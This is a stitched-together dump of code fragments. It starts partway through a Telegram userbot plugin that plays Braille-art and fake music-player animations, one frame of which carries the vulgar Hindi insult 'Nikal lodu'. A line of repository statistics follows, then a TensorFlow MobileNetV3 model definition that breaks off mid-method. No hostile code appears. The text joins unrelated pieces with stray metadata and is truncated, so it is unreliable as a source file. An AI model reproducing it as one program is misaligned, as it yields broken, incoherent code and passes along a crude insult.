"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⠀⢳⡀⠀⡏⠀⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Lavde ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀|__|⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀⠀⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Pehli ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀(P)⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Fursat ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀⠀__ ⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Meeee ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀|__| ⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
"`⠀⠀⠀⣠⣶⡾⠏⠉⠙⠳⢦⡀⠀⠀⠀⢠⠞⠉⠙⠲⡀⠀\n ⠀⣴⠿⠏⠀⠀⠀⠀⠀ ⠀⢳⡀⠀⡏⠀⠀ ⠀⢷\n⢠⣟⣋⡀⢀⣀⣀⡀⠀⣀⡀⣧⠀⢸⠀ ⠀ ⡇\n⢸⣯⡭⠁⠸⣛⣟⠆⡴⣻⡲⣿ ⣸ Nikal ⡇\n ⣟⣿⡭⠀⠀⠀⠀⠀⢱⠀ ⣿ ⢹⠀ ⡇\n ⠙⢿⣯⠄⠀⠀lodu⠀⠀⡿ ⠀⡇⠀⠀⠀⠀ ⡼\n⠀⠀⠀⠹⣶⠆⠀⠀⠀⠀⠀⡴⠃⠀ ⠘⠤⣄⣠⠞⠀\n⠀⠀⠀⠀⢸⣷⡦⢤⡤⢤⣞⣁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀\n⠀⢀⣤⣴⣿⣏⠁⠀⠀⠸⣏⢯⣷⣖⣦⡀⠀⠀⠀⠀⠀⠀\n⢀⣾⣽⣿⣿⣿⣿⠛⢲⣶⣾⢉⡷⣿⣿⠵⣿⠀⠀⠀⠀⠀⠀\n⣼⣿⠍⠉⣿⡭⠉⠙⢺⣇⣼⡏⠀⠀ ⠀⣄⢸⠀⠀⠀⠀⠀⠀`",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 6])
@borg.on(admin_cmd(pattern=f"music$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 1.5
animation_ttl = range(0, 11)
await event.edit("starting player...")
animation_chars = [
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:00** ▱▱▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `▶️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:01** ▰▱▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:02** ▰▰▱▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤⬤ 81% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:03** ▰▰▰▱▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀ [Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:04** ▰▰▰▰▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:05** ▰▰▰▰▱▱▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:06** ▰▰▰▰▰▰▱▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:07** ▰▰▰▰▰▰▰▱▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:08** ▰▰▰▰▰▰▰▰▱▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:09** ▰▰▰▰▰▰▰▰▰▱ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏸️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**",
"⬤⬤◯ 80% ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀`✖️`\n\n⠀⠀⠀⠀⠀[Survivor Music Player](tg://user?id=916234223)\n\n⠀⠀⠀⠀**Now Playing:shape of u**\n\n**00:10** ▰▰▰▰▰▰▰▰▰▰ **00:10**\n\n⠀⠀⠀⠀⠀`🔂` `⏮️` `⏪️` `⏺️` `⏩️` `⏭️`\n\n**⠀Next Song:** __Alan Walker - Alone.__\n\n⠀⠀⠀⠀**⠀Device: Nokia 1100**"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 11])
@borg.on(admin_cmd(pattern=f"squ$",outgoing=True))
async def _(event):
if event.fwd_from:
return
await event.edit("╔═══════════════════╗ \n \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n \t░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ \t░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(1)
await event.edit("╔═══════════════════╗ \n ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ \n╚═══════════════════╝")
await asyncio.sleep(6)
| 60.887363 | 307 | 0.223751 | 2,863 | 22,163 | 5.171149 | 0.103039 | 0.106991 | 0.144681 | 0.114421 | 0.887741 | 0.87592 | 0.844107 | 0.821817 | 0.602972 | 0.592165 | 0 | 0.018817 | 0.211118 | 22,163 | 363 | 308 | 61.055096 | 0.255948 | 0 | 0 | 0.309735 | 0 | 0.050147 | 0.657248 | 0.511055 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.020649 | 0 | 0.050147 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8cc07cfb37d4009c461d62717d82adb50c3a4096 | 17,966 | py | Python | model_def.py | dkumazaw/mobilenets-tpu | 2cdce05931361366a1cb17461ba7205ec558f31d | [
"Apache-2.0"
] | 12 | 2019-07-26T03:40:51.000Z | 2020-10-17T11:23:46.000Z | model_def.py | dkumazaw/mobilenets-tpu | 2cdce05931361366a1cb17461ba7205ec558f31d | [
"Apache-2.0"
] | null | null | null | model_def.py | dkumazaw/mobilenets-tpu | 2cdce05931361366a1cb17461ba7205ec558f31d | [
"Apache-2.0"
] | 1 | 2021-04-15T09:17:18.000Z | 2021-04-15T09:17:18.000Z | import tensorflow as tf
from defs import BlockArgs, GlobalParams
from module import hardSigmoid, hardSwish
from ops import *
class V3Block(object):
"""A class of MobileNetV3 Inverted Residual Bottleneck."""
def __init__(self, block_args, global_params):
"""
Args:
block_args: BlockArgs, arguments to create a V3 block.
global_params: GlobalParams, a set of global parameters.
"""
self._block_args = block_args
self._batch_norm_momentum = global_params.batch_norm_momentum
self._batch_norm_epsilon = global_params.batch_norm_epsilon
if global_params.data_format == 'channels_first':
self._channel_axis = 1
self._spatial_dims = [2, 3]
else:
self._channel_axis = -1
self._spatial_dims = [1, 2]
self.has_se = (self._block_args.se_ratio is not None) and (
self._block_args.se_ratio > 0) and (self._block_args.se_ratio <= 1)
self.nonlinearity = hardSwish if block_args.nonlinearity == 'HS' else tf.nn.relu6
self.endpoints = None
# Builds the block accordings to arguments.
self._build()
def _build(self):
"""Builds the V3 block according to the arguments."""
filters = self._block_args.hidden_filters
# Expansion phase:
self._expand_conv = tf.keras.layers.Conv2D(
filters,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn0 = tf.layers.BatchNormalization(
axis=self._channel_axis,
momentum=self._batch_norm_momentum,
epsilon=self._batch_norm_epsilon,
fused=True)
kernel_size = self._block_args.kernel_size
# Depth-wise convolution phase:
self._depthwise_conv = tf.keras.layers.DepthwiseConv2D(
[kernel_size, kernel_size],
strides=self._block_args.strides,
depthwise_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn1 = tf.layers.BatchNormalization(
axis=self._channel_axis,
momentum=self._batch_norm_momentum,
epsilon=self._batch_norm_epsilon,
fused=True)
if self.has_se:
num_reduced_filters = max(
1, int(self._block_args.input_filters * self._block_args.se_ratio))
# Squeeze and Excitation layer.
self._se_reduce = tf.keras.layers.Conv2D(
num_reduced_filters,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=True)
self._se_expand = tf.keras.layers.Conv2D(
filters,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=True)
# Output phase:
filters = self._block_args.output_filters
self._project_conv = tf.keras.layers.Conv2D(
filters,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn2 = tf.layers.BatchNormalization(
axis=self._channel_axis,
momentum=self._batch_norm_momentum,
epsilon=self._batch_norm_epsilon,
fused=True)
def _call_se(self, input_tensor):
"""Call Squeeze and Excitation layer.
Args:
input_tensor: Tensor, a single input tensor for Squeeze/Excitation layer.
Returns:
A output tensor, which should have the same shape as input.
"""
se_tensor = tf.reduce_mean(
input_tensor, self._spatial_dims, keepdims=True)
se_tensor = self._se_expand(tf.nn.relu6(self._se_reduce(se_tensor)))
tf.logging.info('Built Squeeze and Excitation with tensor shape: %s' %
(se_tensor.shape))
return hardSigmoid(se_tensor) * input_tensor
def call(self, inputs, training=True):
"""Implementation of Block call().
Args:
inputs: the inputs tensor.
training: boolean, whether the model is constructed for training.
Returns:
A output tensor.
"""
tf.logging.info('Block input: %s shape: %s' %
(inputs.name, inputs.shape))
x = self.nonlinearity(
self._bn0(self._expand_conv(inputs), training=training))
tf.logging.info('Expand: %s shape: %s' % (x.name, x.shape))
x = self.nonlinearity(self._bn1(self._depthwise_conv(x), training=training))
tf.logging.info('DWConv: %s shape: %s' % (x.name, x.shape))
if self.has_se:
with tf.variable_scope('se'):
x = self._call_se(x)
self.endpoints = {'expansion_output': x}
x = self._bn2(self._project_conv(x), training=training)
# Identity op
if self._block_args.id_skip:
if (self._block_args.strides == 1) and self._block_args.input_filters == self._block_args.output_filters:
x = tf.add(x, inputs)
tf.logging.info('Project: %s shape: %s' % (x.name, x.shape))
return x
class MobileNetV3Small(tf.keras.Model):
"""Implements tf.keras.Model for MobileNetV3Small."""
def __init__(self, global_params=None):
"""
Args:
lobal_params: GlobalParams, a set of global parameters.
Raises:
ValueError: when blocks_args is not specified as a list.
"""
super().__init__()
self._blocks_args = \
[BlockArgs(3, 1, 16, 16, 16, True, 2, 0.25, 'RE'),
BlockArgs(3, 1, 16, 72, 24, True, 2, None, 'RE'),
BlockArgs(3, 1, 24, 88, 24, True, 1, None, 'RE'),
BlockArgs(5, 1, 24, 96, 40, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 40, 240, 40, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 40, 240, 40, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 40, 120, 48, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 48, 144, 48, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 48, 288, 96, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 96, 576, 96, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 96, 576, 96, True, 1, 0.25, 'HS')
]
self._global_params = global_params
self.endpoints = None
self._build()
def _build(self):
"""Builds a model."""
self._blocks = []
# Builds blocks.
for block_args in self._blocks_args:
assert block_args.num_repeat > 0
# Update block input and output filters based on depth multiplier.
block_args = block_args._replace(
input_filters=round_filters(block_args.input_filters,
self._global_params),
output_filters=round_filters(block_args.output_filters,
self._global_params))
# The first block needs to take care of stride and filter size increase.
self._blocks.append(V3Block(block_args, self._global_params))
if block_args.num_repeat > 1:
# pylint: disable=protected-access
block_args = block_args._replace(
input_filters=block_args.output_filters, strides=[1, 1])
# pylint: enable=protected-access
for _ in range(block_args.num_repeat - 1):
self._blocks.append(V3Block(block_args, self._global_params))
batch_norm_momentum = self._global_params.batch_norm_momentum
batch_norm_epsilon = self._global_params.batch_norm_epsilon
if self._global_params.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
# Stem part.
self._conv_stem = tf.keras.layers.Conv2D(
filters=round_filters(16, self._global_params),
kernel_size=[3, 3],
strides=[2, 2],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn0 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
# Head part.
self._conv_expand = tf.keras.layers.Conv2D(
filters=576,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn1 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
self._avg_pooling = tf.keras.layers.AveragePooling2D(
pool_size=[7, 7],
data_format=self._global_params.data_format)
self._conv_head = tf.keras.layers.Conv2D(
filters=1280,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._final = tf.keras.layers.Conv2D(
filters=self._global_params.num_classes,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
if self._global_params.dropout_rate > 0:
self._dropout = tf.keras.layers.Dropout(
self._global_params.dropout_rate)
else:
self._dropout = None
def call(self, inputs, training=True):
"""Implementation of MobileNetV3 call().
Args:
inputs: input tensors.
training: boolean, whether the model is constructed for training.
Returns:
output tensors.
"""
outputs = None
self.endpoints = {}
# Calls Stem layers
with tf.variable_scope('v3_stem'):
outputs = hardSwish(
self._bn0(self._conv_stem(inputs), training=training))
tf.logging.info('Built stem layers with output shape: %s' %
outputs.shape)
self.endpoints['stem'] = outputs
# Calls blocks.
for idx, block in enumerate(self._blocks):
with tf.variable_scope('v3_blocks_%s' % idx):
outputs = block.call(outputs, training=training)
self.endpoints['block_%s' % idx] = outputs
if block.endpoints:
for k, v in block.endpoints.items():
self.endpoints['block_%s/%s' % (idx, k)] = v
# Calls final layers and returns logits.
with tf.variable_scope('v3_head'):
outputs = hardSwish(
self._bn1(self._conv_expand(outputs), training=training))
outputs = self._avg_pooling(outputs)
outputs = hardSwish(self._conv_head(outputs))
if self._dropout:
outputs = self._dropout(outputs, training=training)
outputs = tf.reshape(self._final(outputs), [-1, self._global_params.num_classes])
self.endpoints['head'] = outputs
return outputs
class MobileNetV3Large(tf.keras.Model):
"""Implements tf.keras.Model for MobileNetV3Large."""
def __init__(self, global_params=None):
"""
Args:
lobal_params: GlobalParams, a set of global parameters.
Raises:
ValueError: when blocks_args is not specified as a list.
"""
super().__init__()
self._blocks_args = \
[BlockArgs(3, 1, 16, 16, 16, True, 1, None, 'RE'),
BlockArgs(3, 1, 16, 64, 24, True, 2, None, 'RE'),
BlockArgs(3, 1, 24, 72, 24, True, 1, None, 'RE'),
BlockArgs(5, 1, 24, 72, 40, True, 2, 0.25, 'RE'),
BlockArgs(5, 1, 40, 120, 40, True, 1, 0.25, 'RE'),
BlockArgs(5, 1, 40, 120, 40, True, 1, 0.25, 'RE'),
BlockArgs(3, 1, 40, 240, 80, True, 2, None, 'HS'),
BlockArgs(3, 1, 80, 200, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 184, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 184, 80, True, 1, None, 'HS'),
BlockArgs(3, 1, 80, 480, 112, True, 1, 0.25, 'HS'),
BlockArgs(3, 1, 112, 672, 112, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 112, 672, 160, True, 2, 0.25, 'HS'),
BlockArgs(5, 1, 160, 960, 160, True, 1, 0.25, 'HS'),
BlockArgs(5, 1, 160, 960, 160, True, 1, 0.25, 'HS')
]
self._global_params = global_params
self.endpoints = None
self._build()
def _build(self):
"""Builds a model."""
self._blocks = []
# Builds blocks.
for block_args in self._blocks_args:
assert block_args.num_repeat > 0
# Update block input and output filters based on depth multiplier.
block_args = block_args._replace(
input_filters=round_filters(block_args.input_filters,
self._global_params),
output_filters=round_filters(block_args.output_filters,
self._global_params))
# The first block needs to take care of stride and filter size increase.
self._blocks.append(V3Block(block_args, self._global_params))
if block_args.num_repeat > 1:
# pylint: disable=protected-access
block_args = block_args._replace(
input_filters=block_args.output_filters, strides=[1, 1])
# pylint: enable=protected-access
for _ in range(block_args.num_repeat - 1):
self._blocks.append(V3Block(block_args, self._global_params))
batch_norm_momentum = self._global_params.batch_norm_momentum
batch_norm_epsilon = self._global_params.batch_norm_epsilon
if self._global_params.data_format == 'channels_first':
channel_axis = 1
else:
channel_axis = -1
# Stem part.
self._conv_stem = tf.keras.layers.Conv2D(
filters=round_filters(16, self._global_params),
kernel_size=[3, 3],
strides=[2, 2],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn0 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
# Head part.
self._conv_expand = tf.keras.layers.Conv2D(
filters=960,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._bn1 = tf.layers.BatchNormalization(
axis=channel_axis,
momentum=batch_norm_momentum,
epsilon=batch_norm_epsilon,
fused=True)
self._avg_pooling = tf.keras.layers.AveragePooling2D(
pool_size=[7, 7],
data_format=self._global_params.data_format)
self._conv_head = tf.keras.layers.Conv2D(
filters=1280,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
self._final = tf.keras.layers.Conv2D(
filters=self._global_params.num_classes,
kernel_size=[1, 1],
strides=[1, 1],
kernel_initializer=conv_kernel_initializer,
padding='same',
use_bias=False)
if self._global_params.dropout_rate > 0:
self._dropout = tf.keras.layers.Dropout(
self._global_params.dropout_rate)
else:
self._dropout = None
def call(self, inputs, training=True):
"""Implementation of MobileNetV3 call().
Args:
inputs: input tensors.
training: boolean, whether the model is constructed for training.
Returns:
output tensors.
"""
outputs = None
self.endpoints = {}
# Calls Stem layers
with tf.variable_scope('v3_stem'):
outputs = hardSwish(
self._bn0(self._conv_stem(inputs), training=training))
tf.logging.info('Built stem layers with output shape: %s' %
outputs.shape)
self.endpoints['stem'] = outputs
# Calls blocks.
for idx, block in enumerate(self._blocks):
with tf.variable_scope('v3_blocks_%s' % idx):
outputs = block.call(outputs, training=training)
self.endpoints['block_%s' % idx] = outputs
if block.endpoints:
for k, v in block.endpoints.items():
self.endpoints['block_%s/%s' % (idx, k)] = v
# Calls final layers and returns logits.
with tf.variable_scope('v3_head'):
outputs = hardSwish(
self._bn1(self._conv_expand(outputs), training=training))
outputs = self._avg_pooling(outputs)
outputs = hardSwish(self._conv_head(outputs))
if self._dropout:
outputs = self._dropout(outputs, training=training)
